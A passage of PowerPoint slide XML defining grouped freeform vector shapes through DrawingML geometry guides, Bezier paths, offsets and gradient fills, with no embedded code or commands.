                  <a:xfrm>
                    <a:off x="315" y="1684"/>
                    <a:ext cx="284" cy="90"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 99 w 203"/>
                      <a:gd name="T1" fmla="*/ 15 h 65"/>
                      <a:gd name="T2" fmla="*/ 27 w 203"/>
                      <a:gd name="T3" fmla="*/ 0 h 65"/>
                      <a:gd name="T4" fmla="*/ 0 w 203"/>
                      <a:gd name="T5" fmla="*/ 7 h 65"/>
                      <a:gd name="T6" fmla="*/ 0 w 203"/>
                      <a:gd name="T7" fmla="*/ 7 h 65"/>
                      <a:gd name="T8" fmla="*/ 0 w 203"/>
                      <a:gd name="T9" fmla="*/ 7 h 65"/>
                      <a:gd name="T10" fmla="*/ 178 w 203"/>
                      <a:gd name="T11" fmla="*/ 55 h 65"/>
                      <a:gd name="T12" fmla="*/ 203 w 203"/>
                      <a:gd name="T13" fmla="*/ 48 h 65"/>
                      <a:gd name="T14" fmla="*/ 99 w 203"/>
                      <a:gd name="T15" fmla="*/ 15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03" h="65">
                        <a:moveTo>
                          <a:pt x="99" y="15"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="44" y="2"/>
                          <a:pt x="27" y="0"/>
                          <a:pt x="27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12" y="0"/>
                          <a:pt x="168" y="44"/>
                          <a:pt x="178" y="55"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="188" y="65"/>
                          <a:pt x="203" y="48"/>
                          <a:pt x="203" y="48"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="203" y="48"/>
                          <a:pt x="163" y="29"/>
                          <a:pt x="99" y="15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Arial" charset="0"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="169" name="Freeform 1753"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="564" y="1751"/>
                    <a:ext cx="208" cy="286"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 149"/>
                      <a:gd name="T1" fmla="*/ 205 h 205"/>
                      <a:gd name="T2" fmla="*/ 15 w 149"/>
                      <a:gd name="T3" fmla="*/ 201 h 205"/>
                      <a:gd name="T4" fmla="*/ 129 w 149"/>
                      <a:gd name="T5" fmla="*/ 150 h 205"/>
                      <a:gd name="T6" fmla="*/ 149 w 149"/>
                      <a:gd name="T7" fmla="*/ 112 h 205"/>
                      <a:gd name="T8" fmla="*/ 149 w 149"/>
                      <a:gd name="T9" fmla="*/ 60 h 205"/>
                      <a:gd name="T10" fmla="*/ 25 w 149"/>
                      <a:gd name="T11" fmla="*/ 0 h 205"/>
                      <a:gd name="T12" fmla="*/ 0 w 149"/>
                      <a:gd name="T13" fmla="*/ 7 h 205"/>
                      <a:gd name="T14" fmla="*/ 0 w 149"/>
                      <a:gd name="T15" fmla="*/ 205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49" h="205">
                        <a:moveTo>
                          <a:pt x="0" y="205"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="15" y="201"/>
                          <a:pt x="15" y="201"/>
                          <a:pt x="15" y="201"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="129" y="150"/>
                          <a:pt x="129" y="150"/>
                          <a:pt x="129" y="150"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="149" y="112"/>
                          <a:pt x="149" y="112"/>
                          <a:pt x="149" y="112"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="149" y="60"/>
                          <a:pt x="149" y="60"/>
                          <a:pt x="149" y="60"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="25" y="0"/>
                          <a:pt x="25" y="0"/>
                          <a:pt x="25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13" y="35"/>
                          <a:pt x="20" y="189"/>
                          <a:pt x="0" y="205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Arial" charset="0"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="170" name="Freeform 1754"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="126" y="1976"/>
                    <a:ext cx="391" cy="103"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 661"/>
                      <a:gd name="T1" fmla="*/ 52 h 175"/>
                      <a:gd name="T2" fmla="*/ 208 w 661"/>
                      <a:gd name="T3" fmla="*/ 0 h 175"/>
                      <a:gd name="T4" fmla="*/ 661 w 661"/>
                      <a:gd name="T5" fmla="*/ 121 h 175"/>
                      <a:gd name="T6" fmla="*/ 453 w 661"/>
                      <a:gd name="T7" fmla="*/ 175 h 175"/>
                      <a:gd name="T8" fmla="*/ 0 w 661"/>
                      <a:gd name="T9" fmla="*/ 52 h 1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61" h="175">
                        <a:moveTo>
                          <a:pt x="0" y="52"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="208" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="661" y="121"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="453" y="175"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="52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Arial" charset="0"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="171" name="Freeform 1755"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="394" y="2047"/>
                    <a:ext cx="118" cy="52"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 199"/>
                      <a:gd name="T1" fmla="*/ 54 h 87"/>
                      <a:gd name="T2" fmla="*/ 0 w 199"/>
                      <a:gd name="T3" fmla="*/ 87 h 87"/>
                      <a:gd name="T4" fmla="*/ 199 w 199"/>
                      <a:gd name="T5" fmla="*/ 35 h 87"/>
                      <a:gd name="T6" fmla="*/ 199 w 199"/>
                      <a:gd name="T7" fmla="*/ 0 h 87"/>
                      <a:gd name="T8" fmla="*/ 0 w 199"/>
                      <a:gd name="T9" fmla="*/ 54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9" h="87">
                        <a:moveTo>
                          <a:pt x="0" y="54"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="87"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="199" y="35"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="199" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="54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Arial" charset="0"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="172" name="Freeform 1756"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="126" y="2006"/>
                    <a:ext cx="268" cy="93"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 453 w 453"/>
                      <a:gd name="T1" fmla="*/ 156 h 156"/>
                      <a:gd name="T2" fmla="*/ 0 w 453"/>
                      <a:gd name="T3" fmla="*/ 36 h 156"/>
                      <a:gd name="T4" fmla="*/ 0 w 453"/>
                      <a:gd name="T5" fmla="*/ 0 h 156"/>
                      <a:gd name="T6" fmla="*/ 453 w 453"/>
                      <a:gd name="T7" fmla="*/ 123 h 156"/>
                      <a:gd name="T8" fmla="*/ 453 w 453"/>
                      <a:gd name="T9" fmla="*/ 156 h 1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3" h="156">
                        <a:moveTo>
                          <a:pt x="453" y="156"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="36"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="453" y="123"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="453" y="156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Arial" charset="0"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="173" name="Freeform 1757"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="164" y="1984"/>
                    <a:ext cx="306" cy="83"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 517"/>
                      <a:gd name="T1" fmla="*/ 37 h 139"/>
                      <a:gd name="T2" fmla="*/ 382 w 517"/>
                      <a:gd name="T3" fmla="*/ 139 h 139"/>
                      <a:gd name="T4" fmla="*/ 517 w 517"/>
                      <a:gd name="T5" fmla="*/ 101 h 139"/>
                      <a:gd name="T6" fmla="*/ 134 w 517"/>
                      <a:gd name="T7" fmla="*/ 0 h 139"/>
                      <a:gd name="T8" fmla="*/ 0 w 517"/>
                      <a:gd name="T9" fmla="*/ 37 h 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7" h="139">
                        <a:moveTo>
                          <a:pt x="0" y="37"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="382" y="139"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="517" y="101"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="134" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="37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Arial" charset="0"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="157" name="Group 1758"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="3356" y="1590"/>
                  <a:ext cx="215" cy="139"/>
                  <a:chOff x="126" y="1682"/>
                  <a:chExt cx="646" cy="417"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="158" name="Freeform 1759"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="295" y="1682"/>
                    <a:ext cx="295" cy="368"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 14 w 211"/>
                      <a:gd name="T1" fmla="*/ 8 h 263"/>
                      <a:gd name="T2" fmla="*/ 14 w 211"/>
                      <a:gd name="T3" fmla="*/ 207 h 263"/>
                      <a:gd name="T4" fmla="*/ 192 w 211"/>
                      <a:gd name="T5" fmla="*/ 254 h 263"/>
                      <a:gd name="T6" fmla="*/ 192 w 211"/>
                      <a:gd name="T7" fmla="*/ 56 h 263"/>
                      <a:gd name="T8" fmla="*/ 14 w 211"/>
                      <a:gd name="T9" fmla="*/ 8 h 2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1" h="263">
                        <a:moveTo>
                          <a:pt x="14" y="8"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="16"/>
                          <a:pt x="1" y="187"/>
                          <a:pt x="14" y="207"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="27" y="226"/>
                          <a:pt x="179" y="263"/>
                          <a:pt x="192" y="254"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="204" y="246"/>
                          <a:pt x="211" y="94"/>
                          <a:pt x="192" y="56"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="185" y="42"/>
                          <a:pt x="28" y="0"/>
                          <a:pt x="14" y="8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Arial" charset="0"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="159" name="Freeform 1760"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="333" y="1719"/>
                    <a:ext cx="212" cy="291"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 359"/>
                      <a:gd name="T1" fmla="*/ 0 h 493"/>
                      <a:gd name="T2" fmla="*/ 0 w 359"/>
                      <a:gd name="T3" fmla="*/ 397 h 493"/>
                      <a:gd name="T4" fmla="*/ 359 w 359"/>
                      <a:gd name="T5" fmla="*/ 493 h 493"/>
                      <a:gd name="T6" fmla="*/ 359 w 359"/>
                      <a:gd name="T7" fmla="*/ 97 h 493"/>
                      <a:gd name="T8" fmla="*/ 0 w 359"/>
                      <a:gd name="T9" fmla="*/ 0 h 4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59" h="493">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="397"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="359" y="493"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="359" y="9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hlink"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:schemeClr val="hlink">
                          <a:gamma/>
                          <a:tint val="70588"/>
                          <a:invGamma/>
                        </a:schemeClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="27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Arial" charset="0"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="160" name="Freeform 1761"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="315" y="1684"/>
                    <a:ext cx="284" cy="90"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 99 w 203"/>
                      <a:gd name="T1" fmla="*/ 15 h 65"/>
                      <a:gd name="T2" fmla="*/ 27 w 203"/>
                      <a:gd name="T3" fmla="*/ 0 h 65"/>
                      <a:gd name="T4" fmla="*/ 0 w 203"/>
                      <a:gd name="T5" fmla="*/ 7 h 65"/>
                      <a:gd name="T6" fmla="*/ 0 w 203"/>
                      <a:gd name="T7" fmla="*/ 7 h 65"/>
                      <a:gd name="T8" fmla="*/ 0 w 203"/>
                      <a:gd name="T9" fmla="*/ 7 h 65"/>
                      <a:gd name="T10" fmla="*/ 178 w 203"/>
                      <a:gd name="T11" fmla="*/ 55 h 65"/>
                      <a:gd name="T12" fmla="*/ 203 w 203"/>
                      <a:gd name="T13" fmla="*/ 48 h 65"/>
                      <a:gd name="T14" fmla="*/ 99 w 203"/>
                      <a:gd name="T15" fmla="*/ 15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03" h="65">
                        <a:moveTo>
                          <a:pt x="99" y="15"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="44" y="2"/>
                          <a:pt x="27" y="0"/>
                          <a:pt x="27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12" y="0"/>
                          <a:pt x="168" y="44"/>
                          <a:pt x="178" y="55"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="188" y="65"/>
                          <a:pt x="203" y="48"/>
                          <a:pt x="203" y="48"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="203" y="48"/>
                          <a:pt x="163" y="29"/>
                          <a:pt x="99" y="15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Arial" charset="0"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="161" name="Freeform 1762"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="564" y="1751"/>
                    <a:ext cx="208" cy="286"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 149"/>
                      <a:gd name="T1" fmla="*/ 205 h 205"/>
                      <a:gd name="T2" fmla="*/ 15 w 149"/>
                      <a:gd name="T3" fmla="*/ 201 h 205"/>
                      <a:gd name="T4" fmla="*/ 129 w 149"/>
                      <a:gd name="T5" fmla="*/ 150 h 205"/>
                      <a:gd name="T6" fmla="*/ 149 w 149"/>
                      <a:gd name="T7" fmla="*/ 112 h 205"/>
                      <a:gd name="T8" fmla="*/ 149 w 149"/>
                      <a:gd name="T9" fmla="*/ 60 h 205"/>
                      <a:gd name="T10" fmla="*/ 25 w 149"/>
                      <a:gd name="T11" fmla="*/ 0 h 205"/>
                      <a:gd name="T12" fmla="*/ 0 w 149"/>
                      <a:gd name="T13" fmla="*/ 7 h 205"/>
                      <a:gd name="T14" fmla="*/ 0 w 149"/>
                      <a:gd name="T15" fmla="*/ 205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49" h="205">
                        <a:moveTo>
                          <a:pt x="0" y="205"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="15" y="201"/>
                          <a:pt x="15" y="201"/>
                          <a:pt x="15" y="201"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="129" y="150"/>
                          <a:pt x="129" y="150"/>
                          <a:pt x="129" y="150"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="149" y="112"/>
                          <a:pt x="149" y="112"/>
                          <a:pt x="149" y="112"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="149" y="60"/>
                          <a:pt x="149" y="60"/>
                          <a:pt x="149" y="60"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="25" y="0"/>
                          <a:pt x="25" y="0"/>
                          <a:pt x="25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13" y="35"/>
                          <a:pt x="20" y="189"/>
                          <a:pt x="0" y="205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Arial" charset="0"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="162" name="Freeform 1763"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="126" y="1976"/>
                    <a:ext cx="391" cy="103"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 661"/>
                      <a:gd name="T1" fmla="*/ 52 h 175"/>
                      <a:gd name="T2" fmla="*/ 208 w 661"/>
                      <a:gd name="T3" fmla="*/ 0 h 175"/>
                      <a:gd name="T4" fmla="*/ 661 w 661"/>
                      <a:gd name="T5" fmla="*/ 121 h 175"/>
                      <a:gd name="T6" fmla="*/ 453 w 661"/>
                      <a:gd name="T7" fmla="*/ 175 h 175"/>
                      <a:gd name="T8" fmla="*/ 0 w 661"/>
                      <a:gd name="T9" fmla="*/ 52 h 1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61" h="175">
                        <a:moveTo>
                          <a:pt x="0" y="52"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="208" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="661" y="121"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="453" y="175"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="52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Arial" charset="0"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="163" name="Freeform 1764"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="394" y="2047"/>
                    <a:ext cx="118" cy="52"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 199"/>
                      <a:gd name="T1" fmla="*/ 54 h 87"/>
                      <a:gd name="T2" fmla="*/ 0 w 199"/>
                      <a:gd name="T3" fmla="*/ 87 h 87"/>
                      <a:gd name="T4" fmla="*/ 199 w 199"/>
                      <a:gd name="T5" fmla="*/ 35 h 87"/>
                      <a:gd name="T6" fmla="*/ 199 w 199"/>
                      <a:gd name="T7" fmla="*/ 0 h 87"/>
                      <a:gd name="T8" fmla="*/ 0 w 199"/>
                      <a:gd name="T9" fmla="*/ 54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9" h="87">
                        <a:moveTo>
                          <a:pt x="0" y="54"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="87"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="199" y="35"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="199" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="54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Arial" charset="0"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="164" name="Freeform 1765"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="126" y="2006"/>
                    <a:ext cx="268" cy="93"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 453 w 453"/>
                      <a:gd name="T1" fmla="*/ 156 h 156"/>
                      <a:gd name="T2" fmla="*/ 0 w 453"/>
                      <a:gd name="T3" fmla="*/ 36 h 156"/>
                      <a:gd name="T4" fmla="*/ 0 w 453"/>
                      <a:gd name="T5" fmla="*/ 0 h 156"/>
                      <a:gd name="T6" fmla="*/ 453 w 453"/>
                      <a:gd name="T7" fmla="*/ 123 h 156"/>
                      <a:gd name="T8" fmla="*/ 453 w 453"/>
                      <a:gd name="T9" fmla="*/ 156 h 1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3" h="156">
                        <a:moveTo>
                          <a:pt x="453" y="156"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="36"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="453" y="123"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="453" y="156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Arial" charset="0"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="165" name="Freeform 1766"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="164" y="1984"/>
                    <a:ext cx="306" cy="83"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 517"/>
                      <a:gd name="T1" fmla="*/ 37 h 139"/>
                      <a:gd name="T2" fmla="*/ 382 w 517"/>
                      <a:gd name="T3" fmla="*/ 139 h 139"/>
                      <a:gd name="T4" fmla="*/ 517 w 517"/>
                      <a:gd name="T5" fmla="*/ 101 h 139"/>
                      <a:gd name="T6" fmla="*/ 134 w 517"/>
                      <a:gd name="T7" fmla="*/ 0 h 139"/>
                      <a:gd name="T8" fmla="*/ 0 w 517"/>
                      <a:gd name="T9" fmla="*/ 37 h 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7" h="139">
                        <a:moveTo>
                          <a:pt x="0" y="37"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="382" y="139"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="517" y="101"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="134" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="37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Arial" charset="0"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
          </p:grpSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="144" name="Group 1781"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="5867400" y="2433638"/>
                <a:ext cx="246063" cy="382588"/>
                <a:chOff x="2363" y="1132"/>
                <a:chExt cx="343" cy="529"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="151" name="Freeform 1782"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2474" y="1449"/>
                  <a:ext cx="145" cy="189"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 108 w 108"/>
                    <a:gd name="T1" fmla="*/ 36 h 140"/>
                    <a:gd name="T2" fmla="*/ 108 w 108"/>
                    <a:gd name="T3" fmla="*/ 35 h 140"/>
                    <a:gd name="T4" fmla="*/ 108 w 108"/>
                    <a:gd name="T5" fmla="*/ 28 h 140"/>
                    <a:gd name="T6" fmla="*/ 108 w 108"/>
                    <a:gd name="T7" fmla="*/ 23 h 140"/>
                    <a:gd name="T8" fmla="*/ 108 w 108"/>
                    <a:gd name="T9" fmla="*/ 22 h 140"/>
                    <a:gd name="T10" fmla="*/ 108 w 108"/>
                    <a:gd name="T11" fmla="*/ 17 h 140"/>
                    <a:gd name="T12" fmla="*/ 108 w 108"/>
                    <a:gd name="T13" fmla="*/ 16 h 140"/>
                    <a:gd name="T14" fmla="*/ 108 w 108"/>
                    <a:gd name="T15" fmla="*/ 16 h 140"/>
                    <a:gd name="T16" fmla="*/ 89 w 108"/>
                    <a:gd name="T17" fmla="*/ 7 h 140"/>
                    <a:gd name="T18" fmla="*/ 64 w 108"/>
                    <a:gd name="T19" fmla="*/ 2 h 140"/>
                    <a:gd name="T20" fmla="*/ 57 w 108"/>
                    <a:gd name="T21" fmla="*/ 4 h 140"/>
                    <a:gd name="T22" fmla="*/ 49 w 108"/>
                    <a:gd name="T23" fmla="*/ 6 h 140"/>
                    <a:gd name="T24" fmla="*/ 49 w 108"/>
                    <a:gd name="T25" fmla="*/ 6 h 140"/>
                    <a:gd name="T26" fmla="*/ 0 w 108"/>
                    <a:gd name="T27" fmla="*/ 18 h 140"/>
                    <a:gd name="T28" fmla="*/ 29 w 108"/>
                    <a:gd name="T29" fmla="*/ 47 h 140"/>
                    <a:gd name="T30" fmla="*/ 62 w 108"/>
                    <a:gd name="T31" fmla="*/ 40 h 140"/>
                    <a:gd name="T32" fmla="*/ 62 w 108"/>
                    <a:gd name="T33" fmla="*/ 118 h 140"/>
                    <a:gd name="T34" fmla="*/ 101 w 108"/>
                    <a:gd name="T35" fmla="*/ 129 h 140"/>
                    <a:gd name="T36" fmla="*/ 108 w 108"/>
                    <a:gd name="T37" fmla="*/ 117 h 140"/>
                    <a:gd name="T38" fmla="*/ 108 w 108"/>
                    <a:gd name="T39" fmla="*/ 36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08" h="140">
                      <a:moveTo>
                        <a:pt x="108" y="36"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="36"/>
                        <a:pt x="108" y="36"/>
                        <a:pt x="108" y="35"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="33"/>
                        <a:pt x="108" y="30"/>
                        <a:pt x="108" y="28"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="28"/>
                        <a:pt x="108" y="26"/>
                        <a:pt x="108" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="23"/>
                        <a:pt x="108" y="22"/>
                        <a:pt x="108" y="22"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="21"/>
                        <a:pt x="108" y="19"/>
                        <a:pt x="108" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="17"/>
                        <a:pt x="108" y="17"/>
                        <a:pt x="108" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="16"/>
                        <a:pt x="108" y="16"/>
                        <a:pt x="108" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="105" y="4"/>
                        <a:pt x="95" y="8"/>
                        <a:pt x="89" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="85" y="6"/>
                        <a:pt x="73" y="0"/>
                        <a:pt x="64" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="60" y="3"/>
                        <a:pt x="57" y="4"/>
                        <a:pt x="57" y="4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29" y="47"/>
                        <a:pt x="29" y="47"/>
                        <a:pt x="29" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="62" y="40"/>
                        <a:pt x="62" y="40"/>
                        <a:pt x="62" y="40"/>
